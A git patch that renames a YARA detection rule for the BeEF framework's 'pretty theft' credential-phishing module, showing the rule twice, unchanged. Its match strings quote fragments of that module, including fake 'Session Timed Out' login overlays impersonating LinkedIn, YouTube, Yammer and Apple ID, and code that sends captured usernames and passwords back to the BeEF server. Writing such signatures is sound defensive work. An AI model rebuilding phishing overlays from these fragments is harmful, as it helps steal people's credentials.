From c644eace1f6af623efa276020d4d7cb93bc6920d Mon Sep 17 00:00:00 2001
From: mmorenog <mmorenog@users.noreply.github.com>
Date: Fri, 18 Dec 2015 09:09:48 +0100
Subject: [PATCH] Rename Beef_pretty_theft.yar to EXPERIMENTAL_Beef_pretty_theft.yar

---
 malware/Beef_pretty_theft.yar              | 42 ------------------------------------------
 malware/EXPERIMENTAL_Beef_pretty_theft.yar | 42 ++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 42 insertions(+), 42 deletions(-)
 delete mode 100644 malware/Beef_pretty_theft.yar
 create mode 100644 malware/EXPERIMENTAL_Beef_pretty_theft.yar

diff --git a/malware/Beef_pretty_theft.yar b/malware/Beef_pretty_theft.yar
deleted file mode 100644
index 1fc6a9c..0000000
--- a/malware/Beef_pretty_theft.yar
+++ /dev/null
@@ -1,42 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-/*
-	Yara Rule Set
-	Author: Pasquale Stirparo
-	Date: 2015-10-08
-	Identifier: src_ptheft
-*/
-
-/* Rule Set ----------------------------------------------------------------- */
-
-rule src_ptheft_command {
-	meta:
-		description = "Auto-generated rule - file command.js"
-		author = "Pasquale Stirparo"
-		reference = "not set"
-		date = "2015-10-08"
-		hash = "49c0e5400068924ff87729d9e1fece19acbfbd628d085f8df47b21519051b7f3"
-	strings:
-		$s0 = "var lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';" fullword wide ascii /* score: '38.00' */
-		$s1 = "dark=document.getElementById('darkenScreenObject'); " fullword wide ascii /* score: '21.00' */
-		$s2 = "beef.execute(function() {" fullword wide ascii /* score: '21.00' */
-		$s3 = "var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';" fullword wide ascii /* score: '32.42' */
-		$s4 = "description.text('Enter your Apple ID e-mail address and password');" fullword wide ascii /* score: '28.00' */
-		$s5 = "sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +ti" wide ascii /* score: '28.00' */
-		$s6 = "var logo  = 'https://www.yammer.com/favicon.ico';" fullword wide ascii /* score: '27.42' */
-		$s7 = "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);" fullword wide ascii /* score: '26.00' */
-		$s8 = "var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';" fullword wide ascii /* score: '24.00' */
-		$s9 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';" fullword wide ascii /* score: '24.00' */
-		$s10 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';" fullword wide ascii /* score: '24.00' */
-		$s11 = "var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';" fullword wide ascii /* score: '21.00' */
-		$s12 = "sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>For" wide ascii /* score: '23.00' */
-		$s13 = "inner.append(title, description, user,password);" fullword wide ascii /* score: '23.00' */
-		$s14 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
-		$s15 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
-		$s16 = "answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;" fullword wide ascii /* score: '22.00' */
-		$s17 = "password.keydown(function(event) {" fullword wide ascii /* score: '21.01' */
-	condition:
-		13 of them
-}
diff --git a/malware/EXPERIMENTAL_Beef_pretty_theft.yar b/malware/EXPERIMENTAL_Beef_pretty_theft.yar
new file mode 100644
index 0000000..1fc6a9c
--- /dev/null
+++ b/malware/EXPERIMENTAL_Beef_pretty_theft.yar
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Pasquale Stirparo
+	Date: 2015-10-08
+	Identifier: src_ptheft
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule src_ptheft_command {
+	meta:
+		description = "Auto-generated rule - file command.js"
+		author = "Pasquale Stirparo"
+		reference = "not set"
+		date = "2015-10-08"
+		hash = "49c0e5400068924ff87729d9e1fece19acbfbd628d085f8df47b21519051b7f3"
+	strings:
+		$s0 = "var lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';" fullword wide ascii /* score: '38.00' */
+		$s1 = "dark=document.getElementById('darkenScreenObject'); " fullword wide ascii /* score: '21.00' */
+		$s2 = "beef.execute(function() {" fullword wide ascii /* score: '21.00' */
+		$s3 = "var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';" fullword wide ascii /* score: '32.42' */
+		$s4 = "description.text('Enter your Apple ID e-mail address and password');" fullword wide ascii /* score: '28.00' */
+		$s5 = "sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +ti" wide ascii /* score: '28.00' */
+		$s6 = "var logo  = 'https://www.yammer.com/favicon.ico';" fullword wide ascii /* score: '27.42' */
+		$s7 = "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);" fullword wide ascii /* score: '26.00' */
+		$s8 = "var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';" fullword wide ascii /* score: '24.00' */
+		$s9 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';" fullword wide ascii /* score: '24.00' */
+		$s10 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';" fullword wide ascii /* score: '24.00' */
+		$s11 = "var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';" fullword wide ascii /* score: '21.00' */
+		$s12 = "sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>For" wide ascii /* score: '23.00' */
+		$s13 = "inner.append(title, description, user,password);" fullword wide ascii /* score: '23.00' */
+		$s14 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
+		$s15 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
+		$s16 = "answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;" fullword wide ascii /* score: '22.00' */
+		$s17 = "password.keydown(function(event) {" fullword wide ascii /* score: '21.01' */
+	condition:
+		13 of them
+}
--
libgit2 0.26.0